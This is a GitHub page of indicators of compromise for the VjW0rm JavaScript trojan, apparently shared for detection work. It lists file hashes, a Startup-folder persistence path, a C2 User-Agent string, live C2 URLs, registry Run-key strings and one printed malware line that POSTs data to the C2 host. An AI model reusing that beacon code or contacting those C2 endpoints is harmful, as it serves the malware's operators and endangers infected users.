forked from executemalware/Malware-IOCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path2021-08-18 Vjw0rm IOCs
42 lines (31 loc) · 1.14 KB
/
2021-08-18 Vjw0rm IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
THREAT IDENTIFICATION: VjW0rm
NOTES
A copy of the original .js file is copied to:
C:\Users\analyst\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The C2 traffic had an unusual User-Agent string:
"CASHFLOW$$$_5C7A2FEE\<pcname>\<user>\<OS>\undefined\YES\FALSE".
SUBJECTS OBSERVED
See Attched (sic)
SENDERS OBSERVED
MALDOC FILE HASHES
Remittance-634731.zip
0bb146711b483042b92464a978656575
Contains:
Remittance-634731.js
511f6a9de220c99adf7e2e03a4e48886
VJW0RM SECONDARY JS FILE
PhOPzJgSgd.js
398ea7fcde0fe6de66a488b8d0df37b3
VJW0RM C2
http://severdops.dddns.net:1216/Vre
I SAW DNS QUERIES FOR:
bethhavens.duia.ro
ADDITIONAL STRINGS IN MEMORY
http://bethhavens.duia.ro:62104/Vre
X.open('POST','http://bethhavens.duia.ro:62104/' + C, false);
["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
SUPPORTING EVIDENCE
https://app.any.run/tasks/bbc7864f-4d1c-4f76-866c-8caefdc00219/
https://www.virustotal.com/gui/file/2a830c7923253031907c1dd34c4a9532c1f53e8fe7f6a3c8359a0e93ef4b216e/detection
https://tria.ge/210818-qt34f97lvs